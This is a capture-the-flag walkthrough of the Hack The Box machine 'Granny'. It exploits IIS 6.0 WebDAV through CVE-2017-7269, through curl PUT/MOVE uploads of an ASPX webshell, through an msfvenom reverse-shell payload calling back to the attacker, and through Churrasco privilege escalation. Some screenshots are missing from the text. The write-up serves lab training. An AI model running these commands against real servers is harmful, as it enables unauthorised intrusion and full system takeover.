Granny

Overview

Initial Foothold : Microsoft IIS 6.0 Exploitation

Privilege Escalation :

Enumeration

Starting with port scanning

Port Scanning

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Thu, 25 Jun 2020 16:49:55 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  WebDAV type: Unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (90%), Microsoft Windows Server 2003 SP2 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows 2000 SP4 (85%)

From Full nmap scan we got that port 80 was running Microsoft IIS 6.0

We can also observe that PUT method is allowed from which we can put files on the webserver

Test this functionality using davtest command

From the above result it has been confirmed that we can put files on the server

Confirm that my executing the file

We also found exploit for IIS 6.0 WebServer

Summary

Files can be uploaded on webserver

Exploits are available for Vulnerable WebServer

Exploitation

Using Exploit of IIS 6.0

Use exploit from github for exploiting this Vulnerabilty

GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269GitHub

Launch Listener on port 4444

Execute the exploit

Exploit Completed Successfully and we got shell

Using PUT method

Using curl we will put webshell on the server

But we can't put aspx files on the webserver directly

so first put text file on the server and then change the move the file to aspx format using MOVE functionality which is allowed

First PUT text format of cmdasp.aspx on the webserver using curl

kali@kali:~/htb/10.10.10.15$ curl http://10.10.10.15/ --upload-file cmdasp.txt

Now again use curl command to MOVE file from cmdasp.txt to cmdasp.aspx

curl -X MOVE --header "Destination:http://10.10.10.15/cmdasp.aspx" http://10.10.10.15/cmdasp.txt

Got webshell command execution.

Lets try to get reverse shell

First generate reverse shell payload using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4445 -f exe > shell.exe

Then upload the shell using the above method

kali@kali:~/htb/10.10.10.15$ curl http://10.10.10.15/ --upload-file shell.txt
kali@kali:~/htb/10.10.10.15$ curl -X MOVE --header "Destination:http://10.10.10.15/shell.exe" http://10.10.10.15/shell.txt

We got back the reverse shell

Privilege Escalation

After getting shell of service account always check the privileges of the service account

In this case SeImpersonatePrivilege was enabled which we can exploit to gain system shell

Lets use Churrasco.exe exploit from below github repo

GitHub - Re4son/Churrasco: Changes for Visual Studio 2013GitHub

Transfer this binary along with reverse shell binary to target host using ftp

After trying many other methods of transfer the exploit ftp successfully uploaded the exploit

Create a text file in windows target which contains

Now execute this in ftp using

this downloaded the required files on the target host

C:\WINDOWS\Temp>churrasco.exe -d c:\windows\temp\shell.exe

Got the system shell

Thats all for this box.

Good Bye :)